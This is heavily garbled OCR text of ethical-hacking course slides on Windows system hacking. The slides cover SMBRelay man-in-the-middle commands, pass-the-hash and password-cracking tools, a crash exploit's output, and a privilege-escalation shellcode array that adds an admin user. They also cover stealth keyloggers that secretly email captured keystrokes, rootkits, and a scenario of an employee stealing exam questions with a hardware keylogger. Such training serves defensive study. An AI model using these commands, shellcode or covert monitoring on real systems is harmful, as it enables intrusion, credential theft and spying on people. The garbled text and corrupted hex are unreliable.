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Hacking Tool: NBTDeputy 



© N BTDeputy registers a NetBI OS computer name on the 
network and responds to NetBT name-query requests. 

© 1 1 hel ps to resolve I P address from the NetBI OS computer 
name, which is similar to Proxy ARP. 

© This tool works well with SMBRelay. 

© For example, SM BRelay runs on a computer as 
ANONYMOUS-ONE and the I P address is 192.168.125 
and NBTDeputy is also run on 192.168.125. Then 
SM BRelay may connect to any XP or .N ET server when 
the logon users access "My Network Places." 
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Tool: Legion 



■ 





O Legion 




^^^^ 


1 


scan lype 

(* Scan Range 

C Scan List 


Scan 
Abort Scan 


LEGION v2. 1- 


1 3 shares found on 4 remote hosts. 


Clear 


-Scan Range 

Enter Start IP fl92[l63|20 |l 

Enter End IP fT92[T68|20 |254 


^ Legion 

m-M 192.16320.8 
k-M 192.16320.102 
h-~m 132-16320.144 
l±l 192.16320.170 


\\192.16a20.8\9haredDocs 

\\192.16a20.102\SharedDocs 

\\192.16a20.144\SharedDocs 

^'il 92 1 63 20 1 70\CD Drive fGl 

\\192.16a20.170\SharedDocs 

\\192.16320.170\C 

\M92.16320.170\D 

\M92.16320.170\iJsadata0 

\M92.16320.170\iJsadatal 

\M92.16320.170\usa db 

\M92.16320,170\E 

\\192.16820.170\F 

\\192.16820.170\ijsa 

z\ 


: Show BF tool :| 


Map Drive | 


Save Text 


Legion automates the password guessing in NetBI OS 
sessions. Legion will scan multiple, Class C, 1 P address 
ranges for Wi ndows shares and also offers a manual 
di cti onary attack tool . 
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NetBIOS DoS Attack 



© Sending a NetBIOS Name Release message to the NetBIOS 
NameService(NBNS, UDP B7) on atarget NT/2000 
machi ne forces it to place its name i n confl i ct so that the 
system will no longer will be able to use it. 

© This will block the client from participating in the NetBIOS 
network. 

© Tool: nbname.cpp 

• NBNamecan disable entire LAN sand prevent nnachinesfronn 
rejoining them. 

• Nodes on a NetBIOS network infected by the tool will think that their 
nannes al ready are bei ng used by other nnachi nes. 
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L i 



H acki ng Tool : J ohn the Ri pper 



© It is a command line tool designed to crack both Unix and 
NT passwords. 

© The resuiti ng passwords are case i nsensiti ve and may not 
represent the real mixed- case password. 



Ripper Uersion 1.6 Copyright <c> 1996-98 by Solar Desigi 



iohn [OPTIONS] 

.e:FILE -stdin 

;ntal[:MODE] 
il:MODE 

: LENGTH] 
:[:FILE] 
iiFILE 

iFILE] 
irsiFILE 



-]LOGIN!UID[, 

[-]GID[,..] 

[-]SHELL[,..] 

-]COUNT 

NOME 

:LEUEL 



[PflSSUOIlD-FILES] 

"single craclt" mode 

uordlist mode, read words from FILE or s 
enable rules for uordlist mode 
incremental mode [using section MODE] 
external mode or uord filter 
no cracking, just write words to stdout 
restore an interrupted session [from FIL 
set session file name to FILE 
print status of a session [from FILE] 
malte a cliarset, FILE will be ouerwritten 
show craclted passwords 
perform a benchmark 
.] load this <these> user<s> only 

load users of this <these> groupCs) only 
load users with this <these> shelKs) on 
load salts with at least COUNT passwords 
force ciphertext format NAME <DES/BSDI/M 
enable memory sauing, at LEUEL i..3 
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Password Sniffing 



©Password guessing is liard worl<. 

©Wliy not j ust sniff credentials off tine wi re as users log i n to a 
server and then replay them to gain access? 

©If an attacker is able to eavesdrop on NT/ 2000 logins, then 
this approach can spare lot of random guesswork. 
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Sniffing Hashes Using LophtCrack 



Fie _r -"J" Tools "Window He|p 



SMBP^ketC^irtywOiitput IsMB Packet Capture Output 



Dittirtilionll 



1O.Q0.25 
10.Q0.25 
10.0.(125 



10.0.0.31 
10.0.0.91 
m.fl.0.91 



ername 


Challenge 


LanMan Hash 


NT Hash 


trator 


2f62f 4582c... 
2f62f 4582c... 


f32ba78edf852ff658bc0fdf... 
2c32792ba45ada854b778... 


7af58eae8a0dbab92988b9... 
b81 3d26e4c83282086534... 



trator 



299c1e113... d4328d84eaa2b858861a5... d4328d84eaa2b858861a5. 



Ssv* CspKJie Clear CspVe 




Save Capture 



Clear Capture 



Done 
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Tool: ScoopLM 



.^ijScoopLM 



File View Help 







start 







Server 


Client 


Ac c ount 


Result 


Challenge 


LH res 















© This tool captures 
LM/NTLM 

authentication 
exchange on the 
network. 

© Supports nnicrosoft- 
ds, Active Directory, 
NTLMv2 on 
NetBIOS over 
TCP/IP, Telnet, IIS 
(HTTP), and DCOM 
over TCP/ 1 P. 
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© SM BRelay is essentially an SM B server that can capture user 
names and password hashes from incoming SM B traffic. 

© It can also perform man-in-the-middle(MITM) attacks. 

© To prevent it, NetBIOS over TCP/ IP should be disabled and 
ports B9 and 445 should be blocked. 

© Start the SM BRelay server and listen for SM B packets: 

• c:\>smbrelay/e 

• (Identify the adapter index) 

• c:\>smbrelay/l L <adapter index>/l R odapter index>/L+ 
<5poofed I P> 

• An attacl<er can access the client machineby simply connecting to it 
via relay address using: c:\>net use*\\<spoofea IP>\c$ 

Note: This tool only works on NT 4/ Windows 2000. 




Proof of concept 
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SM BRelay M an-l n-The-M iddle 
Scenario 



Victim client 
192.168.234.220 



Attacker 
192.168.234.50 



M an- in-the- middle 
192.168.234.251 




Victim server 
192.168.234.34 
H R data 



Relay address 
192.168.234.252 



The attacker in this setting sets up a fraudulent server at 192.168.234.251 a relay 
address of 192.168.234.252 using /R, and a target server address of 
192.168.234.34 with /T. 1 
c:\ > smbrelay / 1 L 2 / 1 R / R 192.168.234.252 /T 192.168.234.34 ^ 
When a victi m cl i ent connects to the fraudulent server thi nki ng it is tal ki ng to the 
target, MITM server intercepts the call, hashes the password, and passes the 
connection to the target server. 
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Redi recti ng SM B Logon to the Attacker 



Eavesdropping on LIV| responses 
becomes much easier if the 
attacl<er can tr i cl< the vi cti m to 
attempt Wi ndows authentication 
of the attacl<er's choi ce. 

The basi c tr i ck i s to send an 
email messageto the victim with 
an embedded hyper! ink to a 
fraudulent SM B server. 

When the hyperlink is clicked, 
the user unwittingly sends his 
credentials over the network. 



Attacker cracks the hashes usi ng 
LOphtcrack 



> 




J ohn's hash, 

dfsd7Ecvkxjcx77868cx6vxcv, is 
transmitted over the network 



Ls^ftCHdeiiitlali 




HchJoln, 
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SMB Replay Attacks 



I 




© Trick client computer to request a connection 

© Request connection to the client computer and 
collect challenge 

© Return challenge from client computer as own 
challenge 

© Wait for response from the client computer 

© Return response as own response 

© Best way of f i ghti ng SM B repi ay attack i s by 
enabling SMB signing in security policy 
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SMB Replay Attacks 



5. All right, here's my response 
to your (my) challenge. 



3. OK, here Is 
a challenge. 



I want to connect. 






2. What a coincidence, 
so do I. 



4. Thanks! Here's your 
challenge, right 
back at you. 



6. That's so nice, here's 
your response back to you. 
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Replay Attack Tool : SMBProxy 



© A "Passi ng the H ash" tool that works as a proxy. ^ 

© You can authenticate to a Windows NT4/2000 server by only 
knowi ng the nnd4 hash. 

© You can mount shares and access the registry and anythi ng a 
particular user can do with his/ privileges. 

I© 1 1 does not work with syskey enabled systems. 



SMBproxv Ul.0.0 patrik.karlssonf^ixsecurit i;.cDm 

I 

spibproxy [options] 

-s* <seruerip> to proxy to 

-1 <listenip> to listen to 

-p <port> to listen to <139/445> 

-f* <pwdunpfile> containing hashes 

-y be verbose 

-h your reading it 
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H acki ng Tool : SM B Gri nd 



T Untitled.lc - 5MB Grinder 



File View Help 



Duplicate Entries Removed: 0 



Username 


1 NT Hash 


J LanMan Hash 


1 Challenge 






Administrator 


C7E2G22D7GD3F001 CF0SB0753G4G... 


73CC402B D 3E 791 75GC3D 3B 81 7E 02. . 


"GcleROGIE 






BillG 


C04EB42B9F5B1 1 4CSG921 C41 G3AE... 


5ECD923GD21095CE7584248B8D2... 


'YokoHamc 






1 toura 


FA5GG4S75FFAD F0AFG1 AB F9B 097F. . . 


D CF9CAAGD B C2F2D FAAD 3B 435B 5. . . 


"aaaa" 








1 fredc 


80030E356D15FB1942772DCFD7D... 


3466C2B0487FE39A41 7EAF50CFAC... 


"crackpot" 






threea 


E241 06942BF38BCF57AGA4B2901 6... 


1 C3A2B6D939A1 021 AAD3B435B51 ... 


"aaa" 








i twoa 


C5663434F963BE79C8FD99F535E7... 


89D42A44E771 40AAAAD3B435B51 ... 


"aa" 








Ready 











SM BGrind increases the speed of LOphtcrack sessions on sniffer dumps by 
removing duplication and providing a facility to target specific users 
without havi ng to edit the dump f i I es manual ly. 



BC-Council 



CHC: Cracking passwords 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Hacking Tool: SMBDie 

IsMBdie vO.l 




What isSMBdie? 

It's a proof of concept tool. 

Is it possible to crash Windows computers by 

sending a specially crafted SMB request. 

What computers are vulnerable ? 

Windows NT /2k/XP/. NET RC1 with NETBIOS 

enabled. 

Author 

zamolx3@personal.ro 



Call to arms - Information anarchy 

http: / /www, nmrc. orq/l nfoAnarch^/l nf oAnarch^J. htm 



Computer (IP address) 



1 92.1 GS. 20. 109 
NETBIOS name 



Kill 



M AH YCO -SERVER 



Close 



Status 



Connecting to remote computer ... [port 139) 

Connected. 

Session established. 

Protocol negotiated. 

NULL session established. 

Operating System : Windows 2000 

Connected to IPC$. 

Sending exploit ... 

Done. 



SMBDietool crashes computers running Windows 2000/XP/NT by 

sendi ng specially crafted SM B requests. ^ ^ 

^roof of concept 
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SM B Relay Weakness & 
Counter measures 



Weaknesses 



I 



© The probi em i s to convi nee a 
vi cti m's cl i ent to authenti cate 
totheMITM server. | 

I© A malicious email message to 
L the vi cti m cl i ent, wi th an I 
I embedded hyper I i nk to the I 
I SM BRel ay server's I P address, 
I can be sent. 



I 



Another solution is ARP 
poisoni ng attack agai nst the 
enti re segment, causing all of 
the systems on the segment to 
authenti cate through the ■ 
fraudulent Ml TM server. 



Countermeasures 

© Configure Windows 
2000 to useSMB 
signing. 

© Client and server 
communication will 
cause it to 

cryptograph i cal I y si gn 
each bfock of SM B 
communications. 

© These settings are found 
under Security Policies 
/Security Options. 
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Password Cracking Countermeasures 



I 



© Enforce 8- 12 character 
alphanumeric passwords. 

© Set the password change pol i cy 
to 30 days. 

© Physically isolate and protect the 
server. 

© Use SYSKEY utility to store 
hashes on disk. 

© M on i tor the server logs for brute 
force attacks on user accounts. 
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Password Brute Force Estimate Tool 





USE TO ESTIMATE TIME FOR THE MORE DIFFICULT BRUTE FORCE ONLY 




(DICTIONARY LOOKUP AHACKS WHICH ARE TRIED USUALLY PIRST TAKE SECONDS 




AND GET AN AVERAGE OP 25% of ALL PASSWORDS) 














"ted by{see "how to use this calcuiatof" tab): 




Character 
Set Size 


Entropy or Keyspace of password 




Upper Case Letters 




1 26 


676 




Lower Case Letters 


26 


676 




Numbers 


10 


10 




Special Characters 


32 


1 




or Purely Random Combo of Alpha/Numeric 


62 


1 




.Y Random Combo of Alpha/Numeric/Special 


94 


1 




m SUBJECT TO A DICTIONARY ATOCK 


5 


1 














password length in Characters 






4,569,760 'or 








4 million combinations! 
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Syskey utility 



I 



-Ifi'l'^l 



FHa Edt ViEW loals 




e@ |C:| 
B-^ [D:l 

bQ 

IS Ci Cc 

i D IP 
ffl-Q Mi 

j-Cj Oi 
BHal Ft 

i-El Ur 
IE- CI 

^ Recjicfed 

B-^ IE) 
e@ IF:] 
BtS [G:| 
; &1 CortiKilFaral 



Gecuiing the 



Th 
Df 
Pt 

Or 

r 

(5- 



rta-l. 



£j5l.emG5fieial.ed Passvroid 

Rcq w« o Fldpjj' I.C be rneilxd dMng 



and na imiaai^tnn it \scfi\sil itthg s^Ha<\ 



IE 



23,'Jl ID 33 AH 
10:56 AM 
39^101 11:51 AM 
2Mn 3:52 AH 
23iXJl 10:02AM 
33^101 11:44 AM 
]3rl01 11:iBAM 
2im 11:31 AH 
10:15AM 
33rDl 10:1 BAM 
27m 2M m 



© The key used to encrypt the passwords is randomly generated by the 
Syskey utility 

© Encryption prevents compromise of the passwords 

© Syskey uses 128-bit encryption to encrypt the system hash 

© Syskey must be present for the system to boot 
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Scenario 



David did a scanning of the 
University LAN and found that 
most of the ports where services 
were not needed were disabled. 
David found it difficult to run the 
password crackers, as his boss sits 
next to him. It upset him as the 
exam dates were approaching and 
he had already accepted the money. 

What do you think that David 
would try next? 
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System Hacking: 
Part 1 1 



Escalating Privileges 



CEH Hacking Cycle 




Cracki ng passwords 



Escalating privileges 
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Privilege Escalation 



© I f an attacker gai ns access to the network usi ng non-admi n 
user account the next step is to gain higher privilege to that 
of an adnninistrator 

© Thisiscalledprivilegeescalation 




mm 



I can access the netwo-bk 
using John ' s user account 
but I need "Admin" 
privileges? 
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Cracking NT/ 2000 passwords 



© SAM file in Windows NT/ 2000 contains the user names and 
encrypted passwords. The SAIV| file is located at 
%systennroot%\ systenn32\ config di rectory. 

© Thefile is locked when the OS is running. 

• Booti ng to an alternate OS. 

- NTFSDOS (www.sysl nternals.com) will mount any NTFS 
partition as a logical drive. 

• Backup SAM from the Repair directory. 

- Whenever rdisk/s is run, a compressed copy of the SAM called 
SAM ._ is created i n %systemroot%\ repai r. Expand this fi le usi ng 
c:\>expand sam._sam. 

• Extract the hashes from the SAM. 

- Use LOphtcrack to hash the passwords. 
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Change Recovery Console Password - 
M ethod 1 



I n the case of a Wi ndows 2000 machi nes: 

© You can use the setpwd.exe uti I ity to change the SAM - 
based administrator password. 

© Change to the %SystennRoot%\ Systenn32 fol der . 

© To change the local SAM -based Administrator password, 
typesetpwd and then press ENTER. 

© To change the SAM - based Admi nistrator password on a 
remote domai n control I er : 

• Type setpwd / s: servernanne and then press ENTER, where 
servername is the name of the remote domai n control! er. 

© When you are prompted to type the password for the 
Di rectory Serv ce Restore M ode Admi nistrator account, 
type the new password that you want to use. 
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Change Recovery Console Password - 
M ethod 2 





4. 



Shut down the domain controller on which you want to 
change the password. 

Restart the computer: 1 

• Theselection nnenu screen is displayed during the restart process 

• Press F8 to view advanced startup options ^| 

Select the Directory Service Restore M ode option. 

After you successfully log on, use one of the foil owing 
methods to change the local Administrator password: 

• At a command prompt, type the foil owing command: net user rij 
■ administrator* (or) ■ 

• Use the Local User and Groups snap-in (Lusrmgr.msc) to change 
m the Admi ni strator password ^^^^^^^^^^^h 

Shut down and restart the computer. ^^^^^^^^^H 
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Change Recovery Console Password - 
M ethod 3 



© Assists i n easi ly changi ng of passwords 

© Can also change the local admi nistrator's password 

© U ti I i zes the ad mi n i strator accou nt to I og on 
Recovery Console or Di rectory Services 

© Syntax : net user admi ni strator <password> 
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Privilege Escalation Tool: x.exe 



I© This tool when executed on 

^ the local nnachinewill 

W create user X with 

I password X and makes the 

I X user member of 

I administrator's group. 

This technique is widely 
used in buffer overflow 
exploits. 



char code[] = 

"\x66\x81\xec\x8o\xoo\xB9\xe6\xe0\xba\xoo\xoo\xoo\x89\xo6\xff\x36" 

"\x68\x8e\x4e\xoe\xec\xe8\xc1\xoo\xoo\xoo\xB9\x46\xoB\x31\xco\x50" 

"\x68\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\x56\x08\x89\x46" 

"\xo4\xff\x36\x68\x7e\xd8\xe2\x73\xe8\x9e\xoo\xoo\xoo\x89\x46\xoc" 

"\xff\x76\xo4\x68\x5e\xdf\x7c\xcd\xe8\x8e\xoo\xoo\xoo\xB9\x46\x10" 

"\xff\x76\xo4\x68\xd7\x3d\xoc\xc3\xe8\x7e\xoo\xoo\xoo\x89\x46\x14" 

"\x31\xco\x31\xdb\x43\x50\x68\x72\xoo\x73\xoo\x68\x74\xoo\x6f\xoo" 

"\x68\x72\xoo\x61\xoo\x68\x73\xoo\x74\xoo\x68\x6e\xoo\x69\xoo\x68" 

"\x6d\xoo\x69\xoo\x68\x41\xoo\x64\xoo\x89\x66\x1c\x50\x68\x58\xoo" 

"\xoo\xoo\x89\xe1\x89\x4e\x18\x68\xoo\xoo\x5c\xoo\x50\x53\x50\x50" 

"\^53\^5'^\^5i\^5i\^B9Wi\x5o\x54\x5i\x53\x5o\xff\x56\xio\x8b\x4e" 

"\x18\x49\x49\x51\x89\xe1\x6a\xo1\x51\x6a\xo3\xff\x76\x1c\x6a\xoo" 

"\xff\x56\x14\xff\x56\xoc\x56\x64\xa1\x30\xoo\xoo\xoo\x8b\x40\xoc" 

"\x8b\x70\x1c\xad\x8b\x40\xo8\x5e\xc2\xo4\xoo\x53\x55\x56\x57\x8b" 

"\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b" 

"\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31" 

" \xc o \xac \x 3 8 \xe o \x 7 4 \x o 7 \xc 1 \xcf\x od \x o 1 \xc 7 \xeb \xf 2 \x 3b \x 7c \x 2 4" 

"\x14\x75\xe1\x8b\x5a\x24\xoi\xeb\x66\x8b\xoc\x4b\x8b\x5a\x1c\xo1" 

"\xeb\x8b\xo4\x8b\xo1\xe8\xeb\xo2\x3i\xco\x89\xea\x5f\x5e\x5d\x5b" 

"\xc2\xo4\xoo"; 



int main(int argc, char **argv) 
{ 

int C*functX); 

funct = (int code; 

ant)C*fjnctX); 

} 



BC-CouncI! 



CHC: Escalating privileges 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



System Hacking: 
Part 1 1 1 



Executing applications 



CEH Hacking Cycle 




Cracki ng passwords 



Escalating privileges -i 




Executing applications 
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Tool : psexec 



©Lets you execute processes on other systems remotely. 
©Launches interactive command prompts on remote systems. 



G : SCEHSHa jaSToo IsSnahendranSToo IsSpsexec >psexec 

PsExec ul.41 — execute processes remotely 
Copyright <C> 2001-2003 Mark Russinouich 
uuu.sys internals .con 

PsExec executes a program on a remote system, where remotely executed console 
applications execute interactively. 

Usage: psexec [SScomputer ] [-u user [-p psswd] ] [-3 !-e ] [-i] [-c [-f ! -u ] ] [-d ] [-<priority> ] [-a n,n,...] end [arguments] 
computer Direct PsExec to run the application on the remote 

computer. If you omit the computer name PsExec runs 

the application on the local system, 
-u Specifies optional user name for login to remote 

computer. 

-p Specifies optional password for user name. If you onit this 

you will be prompted to enter a hidden password. 
— s Run the remote process in the System account, 

-e Loads the specified account's profile. 

-i Run the program so that it interacts with the desktop on the 

remote system. 

-c Copy the specified program to the remote system for 

execution. If you omit this option the application 

must be in the system path on the remote system, 
-f Copy the specified program even if the file already 

exists on the remote system, 
-u Copy the specified file only if it has a higher uersion number 

or is newer on than the one on the remote system. 
— d Don't wait for process to terminate <non— interact iue > . 

-priority Specifies -low, -belownormal, -abouenormal, -high or 

-realtime to run the process at a different priority, 
-a Separate processors on which the application can run with 

commas where 1 is the lowest numbered CPU. For example, 

to run the application on CPU 2 and CPU 4, enter: 

"-a 2,4" 

program Name of application to execute. 

arguments Arguments to pass (note that file paths must be 
absolute paths on the target system>. 
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Tool: remoexec 



I 



V| RemoKec 



File Help 



C omput e r 



1Z7. 0. 0. 1 



[Doma.in\ ] Account 



Admini st r at o r 



Password 



******** 



Program 



E: \test 



E X e cut e 



©Executes applications remotely. 
©You should know the foil owing: 

I P address, the account name, 
and password 
application. 
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Keystroke Loggers 



©I f al I other attempts to sniff 
out domain privileges fail, then 
keystroke I ogger i s the sol uti on . 

©Keystroke loggers are stealth 
software that sit between 
keyboard hardware and the 
operati ng system, so that they 
can record every key stroke. 

©There are two types of 
keystroke I oggers: 

1 Software based 
2. H ard ware based 
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Spytech Realtime- spy 



©Records 

Keystrokes 
Websites visited 
I nternet connections 
Windows opened 
Chat conversations 
AppI i cati ons executed 
System information 
System shutdowns 
Logged on users 
Emails typed 
Passwords typed 



Realtime-Spy Console 



File Edit View Favorites Tools Help 

Qb=* • Q - a g] Ps»r* -^f™*. <Jf M,d,= -0' 0' ^ IB □ ^ 

Adi-I ■ ■" ti http://iAiwiAi.spytech-i/^eb,com/rts_test/5pytech/sdCdi:he/index.php 



£!■■ Stem info ■ vievv'locis ■ support logout 



K^strokeLogs 
I^^J VWtitlows Viewed 
[^^^ Applications Ran 
Oil Vtfebsites Visited 



Net Connections 



i#i 



Chat Transcripls 



Documents Vieived 



Keystrokes Typed 

This log contains all keystrokes entered by the user. 



Untitled - Notepad 

Notepad Untitled - Hotapad 

RT5 - Microsoft Visual C++ - [r 



Spyteth Mon 5/13/02 (<, 

Spytech Hon 5/13/02 ij 

Spyteth Mon 5/13/02 (, 

ain.cl Spytech Hon 5/13/02 ij 



W5 FTP LE ftp.sp^teich-web.c 
WindoLvs Task Maneqer 



Spytach Mon 3f 

Spytech Hon 5/13/02 @ SiOgiSS PM 




04:32 PM 
04:36 PM 
04:46 PM 
05:16 PM 



0 
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I KS Software Keylogger 




Datview - Binary Log Translator for IKS 



/^IKS Tut WifiJif-ti Etna InilaUrfkm 



In a SimH) ^mt'iiU'no, no -AKJiO^ mI 1h cf Hied In ordtf it* \t» wMk&m Id h 
rrior^o(*d 

kig rJ« ki 'iy t« ii^wiMC iGi ^hiylhrf e4 ytu tHoiu, and it b«lcK jri«t ir^j 



Filters - 



p [Filter Out Arrow Keys; 

p Filter Out Ctrl and Alt Keys 

\7 Filter Out F1 to F1 2 Keys 

n Filter Out AJI Other Function Xejis 



r Viewer 

^' Use Notepad 

C Translate to Text Only 



- Clear Log 

P Clear Binary Log Upon Exit 

p Clear Text Log Upon Exjt 



Import Binary Log From: 



jcAwinntMks.dat 


Browse... | 


Save Text Log To: ^^^^^^ 


jc:\tempMks.txt 


Browse... | 








Gol 1 



plaee in ifcnleqi 



D '.WJHHTUs cW 



The ddtvnvr.QHC vnver cm fco cr^inJ Ld bic.dnn n^^jikig d Ift^i^ 4&dud^E<.. rou 
chiKSH- tn ODp)^ [jt mvf a yoti can Gip^ il Cater rTMnu!^ 



|i_.^.*''n<".n| 



http://www.amecisco.com/downloads.htm 

1 1 is a desktop activity logger that is 
powered by a kernel mode driver. This 
driver enables it to run si lently at the 
lowest level of Windows 2000/XP 
operating systenns. 
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Ghost Keylogger 



Ghost Keylogger Configuration 



System I File Mail | Filters | View log files | About | 



Mail settings 

\^ Log with email 

I EncriJpt the mail 

I Default Main 
service ' 

Subject |Log file 



Send mail after every: 
Hours Minutes 

F 



3- 



Jq |your_email_address 



Default mail 1 -4 are primary for testing. We don't guarantee 
that they always work. Therefore we recommend that you use 
a User Defined mail account. 

If you don't have an account you can easily create one. To 
do this, have a look in our FAQ. 



Advanced settings... 



Test 



□ K 



2 



Cancel 



Help 



Emails are sent secretly without 
leaving any trace on the monitored 
machine. 



Emails ane sent on a timely basis. 



To make the email system as 
simple as possible. Ghost Keylogger 
fias a number of pneconfiguned mail 
services. 



— • The only thing you have to do In 
order to receive the log flies is to 
enter your email address. 

http :/ / www. keyl ogger . net/ 
It is a stealth keylogger and invisible surveillance tool 
that records every keystroke to an encrypted log fi le. 
The I og f i I e can be sent secretl y wi th emai I to a 
specified address. 



Before you start logging you can try 
that ttie Email works by pressing the 
Test" button. 



Picture Source: 

http://www.shareup.com/Ghost_Keylogger-screenshot-1672.html 
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H acki ng Tool : H ardware Key Logger 



© The H ardware Key Logger i s a ti ny 
hardware device that can be 
attached i n between a keyboard and 
a computer. 

© 1 1 keeps a record of al I key strokes 
typed on the keyboard. The 
record i ng process is total I y 
transparent to the end user. 

© There are two types of hardware 
key! oggers: 

• PS/2 key! oggers 

• USB key! oggers 
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H ardware Keylogger: Output 



4 Untitled -Notepad 




File Edit Format Help 


Press e for safe mode. 


±1 


■t^■^^■:^ 

KeyGhosT ii standard m vl.Q.J 
WW. keyghost. com 
help®keyghost. com 




Menu. 


1 


1. Entire log download 

2. Section log download 

3. Wipe log 

4. Format 

5. Options change 

8. Diagnostics 

9. exit 




Do not change window until finish. 




Select number. 


i 

T 1 


UJ 


iHstartl J ^ ^ $ J [^Untitled -Notepad 


E3<Be|3^ 3;29AM 



Untitled - Notepad 



File Edit Format Help 



Options 

optimize speed 
Password change 
Diagnostics 
exit 



DO not change window until finish. 
Select number. 1 
Key to stop. 

Keys so far is 640 out of 523958 ... 

tom©msn.com<tab>confidenti urgent Attentionni smith, 
As per our telephonic conversation yesterday I have 
<bks><bks><bks><bks>C<bks>C 

lx))am passing on the information about My compani<bks>u<bks>y' s various 
client 

s. So tell mejJw-gtSce^n time where we sah<bks><bks>FiaT 
Donot f^cipge^to bring along the ci-;bks>-;bks><bkss-<bks>(<bks>(8x)^}Thevj:heck 
alon 

g wifh you . . 



I 



Hey i tlrki^someones knocking at my cabin door,<bks>. 
Do call me y?b)»*uiil<bks>-p. 
smit<ON>yahoomail . coifr 

eccouncilceh 

wipe log (y/n) 

iilStartl 




3 aboutiblank- Microsoft. 



I I^Untitled- Notepad 



3:46 AM 
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What isSpyware? 



I 



© Spyware is programs that records computer 
activities on a machine. 

Records keystrokes 
Records email messages 
Records I M chat sessions 
Records websites visited 
Records applications opened 
Captures screenshots 
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Spyware: Spector 



©Spector is spyware that records everything that one does on 
the I nternet. 

©Spector automatical I y takes hundreds of snapshots every 
hour, very much I i l<e a survei 1 1 ance camera. 

©Spector worl<s by tal<i ng a snapshot of whatever is on the 
computer screen and saves it away in a hidden location on the 
systems hard drive. 



3 Spector Toolbar Screen Shot - Microsoft Internet EKplorer 



jn|x| 



Close This Window 







□ 




m 




0 


\^ 






(&0 


T 




3 EKtKlrt 


Fit View 




Beck 
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H acki ng Tool : eB I aster 



H eBlaster 3.0 flF ||^ 


"^laster^ 1 

0lBitontrol PanelH 


OptiDtis Reports 


Help 









S-ecLirilty/ 
Access 




R«oafd 


O 


Wh«n to 

H-scord 


<1> 





- Report Deliveri) — 
On Off 



- Report Format 

f HTML <^ Plaits Text 



Report Sending Interval 
Send Every 



■ Send Email Report To 

To jeblasterfSiJahoo.com 
CD j 



BCC [ 



60 



inutes 



f~ Once a day at | 2:44:59 PM -7- 



■Email Identification (Optional) 



i9} 



From jeBlaster - Johns Laptop 



Subject j eBlaster Activity Report 



- Iriactivity Timeotit" 



Minutes 



■Delivery Method (S-J*-* 

via SpectorSoft Server 
r via Custom Server - Options 



1 1 shows what the survei 1 1 ance target surfs on the I nternet and records al I 
emails, chats, instant messages, websites visited, and l<eystrokes typed 
and automatically sends this recorded information to the desired email 
address. 
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stealth Voice Recorder 



1^ 



•rl TOBEST Stealth Recorder Options 



|g General | <^ Recording | Email & FTP | 

Voice Activation System Level (dB) Record / Playback Devices - 
. . . . JJ 



Recording starts at: 45 dB 
Recording ends at 



sees later below activation dB. 



Rec: 


SIS 701 8 Wave 


■w 




CD 


A 








Play: 


SIS 701 8 Wave 





Volume - 
Record: 



Play: 



W Mic Auto Gain Control 
r Mute 



Monitor 



Start 



Ln 





Talk to your mic and check to see if your mic is set up properly 



-Misc ■ 



! r stealth Mode 
V start record at launching 
I Hide About Screen at startup 



pPopup Menu HotKey 
p Control 

F Alt 
r Shift 



A 




B 




C 




n 


V 



OK 



Cancel 



Help 



fj TOBEST Stealth Recorder Options 



General Recording Email S FTP 



P After Each Recording ■ 



R Send recorded file via e-mail W Upload to FTP Server 



re-Mail Info 



e-mail: lmymailbox@yahoo.com 



SMTP: lsmtp.myserver.com 



-FTP Server Info 



Host: |ftp .server .com 



User ID: jusername 
Server 



Password: 



******** 



Directory |''ecordingsJrom_home 
F Passive Transfer 



OK 



Cancel 



Help 
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Stea th Key ogger 



I 



©Keystrokes recording 
©Websites visited 

©Chat and instant message monitoring 
©Recording applications executed 
©File monitoring 
©Screenshot monitoring 
©Printer monitoring 
©Clipboard monitoring 



stealth KeyLogger 



— Options- 



Dailv Logs 



Global Logs 



Screens hots 



Settings 
Iff* 

Registration 



- Actions - 



^1 

L_J Monitoring 



m\ Stop 
J Monitoring 



Application Status : Monitoring 



Q 



Current User : Mahendran 
— Current Da^J Reports 



Hide 



t Monitor 



\^ File/Folder Monitor 



Keystroke Typed Chat 
WebSites Visited 
Application Run V^^^ Clipboard Monitor 
^1^? Screen Shots ^-^iL Monitor 
I^^Sapl Aggregated Report 



STEALTH BEYLDGGER 



(Uninstal Vvj Help 
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stealth Website 



©Designed to monitor and 
record a! I websites visited by a 
user or computer. 

©Offers detailed reports on all 
accessed websites from a si ngle 
computer or from the enti re 
network. 

©Displays reports i n web format 
or secretly sends them to a 
specified email address. 

©All recorded information is 
stored in a secret encrypted file. 
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Scenario 



Every afternoon Daniel I eaves for 
lunch before David. Though he 
closes all his applications, David 
has physi cal access to the system. 

David installs a hardware 
keylogger in his boss' system and 
then waits for his boss to resume 
work. 

Within a few hours, David gets the 
output of the keyl ogger contai ni ng 
the user name and password for 
accessing the Question Bank! 
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System Hacking: 
Part IV 



Hidingfil 



CEH Hacking Cycle 




Cracki ng passwords 



Escalating privileges -i 



Hiding files 
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HidingFiles 



I 



© Therearetwo ways of hi ding files in 
NT/2000. 

• LAttrib 

- use attri b H-h [fil^ directory] 

• 2. NTFS Alternate Data Streaming 

- NTFS files system used by Windows NT, 
2000, and XP has a feature Alternate Data 
Streanns - al I ows data to be stored i n hi dden 
f i I es that are I i n ked to a nornnal vi si bl e f i I e. 

© Streams are not I i mi ted i n size and there 
can be more than one stream I i nked to a 
normal file. 
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Hacking Tool: RootKit 



©What if the very code of the operati ng system came under 
the control of the attacker? 

©The NT/ 2000 rootkit is built as a kernel mode driver 
which can be dynamically loaded at run time. 

©The NT/ 2000 rootkit runs with system privileges, right at 
the core of the NT kernel , so it has access to al I the 
resources of the operati ng system. 

©The rootkit can also: 

hide processes (that is, keep them from being listed) 
hide files 

hide registry entries 

i ntercept keystrokes typed at the system console 
i ssue a debug i nterrupt, causi ng a bl ue screen of death 
redirect EXE files 
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J 



Planting the NT/ 21 



©The rootkit contains a kernel mode 
device driver, called _root_.sys and 
a launcher program, called 
deploy.exe. 

'©After gai ni ng access to the target 
system, the attacker wi 1 1 copy 
_ root_ .sys and deploy.exe onto the 
target system and execute 




deploy.exe. 



©This will install the rootkit device 
driver and start it up. The attacker 
later deletes deploy.exe from the 
target machine. 
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© The attacker can then stop 
and restart the rootkit at 
wi 1 1 by usi ng the 
commands net stop _ root 
